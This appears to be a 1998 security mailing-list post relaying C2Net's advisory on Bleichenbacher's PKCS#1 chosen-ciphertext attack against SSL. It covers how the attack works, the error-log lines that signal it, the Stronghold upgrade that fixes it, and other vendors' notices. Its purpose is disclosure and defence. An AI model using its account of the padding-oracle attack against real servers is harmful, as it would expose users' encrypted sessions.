Date: Fri, 26 Jun 1998 09:48:19 -0500
From: Aleph One <[email protected]>
To: [email protected]Subject: SSL Vulnerabilityhttp://www.c2.net/products/stronghold/support/PKCS1.php
Background
Last week, RSA Data Security notified C2Net Software of a potential
vulnerability that affects the SSL protocol. C2Net Software has
developed a pre-emptive patch which is implemented in the latest
version of Stronghold 2.3. This document is intended to address
questions C2Net customers may have about the implications of that
discovery to their own site.
Technical information
This vulnerability involves a chosen ciphertext attack discovered by
researcher Daniel Bleichenbacher at Bell Labs against
interactive key establishment protocols that use PKCS1, such as SSL.
This can result in the compromise of the session key used for a
particular session after repeatedly sending approximately one million
carefully constructed messages and observing the server's response.
Please see our press release and advisory for additional
details. RSA Labs brought this attack to our attention and their
site contains a more technical overview. CERT will also issue a
bulletin, as will a number of other web server vendors.
What does it mean?
There is potential for a sophisticated user to be able to decrypt a
recorded session's session key and use that to obtain the data
transmitted during that session if they have access to a server they
can use to send approximately one million carefully selected messages
to your server and see what errors it reports. Note that this attack
has to be repeated approximately a million times for each and every
session that an attacker wishes to compromise, because the server's
private key remains uncompromised as a result of this attack.
How can I tell if I'm being attacked?
For each of the approximately 1 million or so messages necessary to
attack a single session, the following 3 lines will be logged in your
ssl/error_log file:
1575:error:0407006B:rsa routines:RSA_padding_check_PKCS1_type_2:block
type is not 02:rsa_pk1.c:207
1575:error:04064072:rsa routines:RSA_EAY_PRIVATE_DECRYPT:padding check
failed:rsa_eay.c:330
1575:error:1408B076:SSL routines:SSL3_GET_CLIENT_KEY_EXCHANGE:bad rsa
decrypt:s3_srvr.c:1259
NOTE that this equates to about 300MB for an attack on a single
session. Although running out of space on the partition your log files
are written to could definitely be an indication, we suggest keeping
an eye out for any usual growth in the size of this file.
What can I do to protect myself?
This vulnerability has only been reported in a research environment
and there have not been reports of sites experiencing this attack
outside of that. However, the publication of this type of
vulnerability may enable sophisticated users to implement it.
Customers are urged to upgrade as a precaution to the latest
version of Stronghold 2.3, which supports this fix as of build
2010 for customers in the US/Canada, build 2051 for customers
elsewhere. You can determine which version you are running from the
output of httpsd -v.
What other vendors/products are affected?
All major vendors have announced that they are working on patched
versions of their web servers products to combat this potential
vulnerability. This vulnerability is not limited to web servers.
Products using SSL to do secure tunneling, for example, may also be
affected.
Sites with other information:
http://www.rsa.com/rsalabs/http://www.ssleay.org/announce/pkcs1.htmlhttp://www.microsoft.com/security/bulletins/ms98-002.htmhttp://www.openmarket.com/security/http://help.netscape.com/products/server/ssldiscovery/http://www.consensus.com/ssl-rsa.htmlftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/README.PKCS1
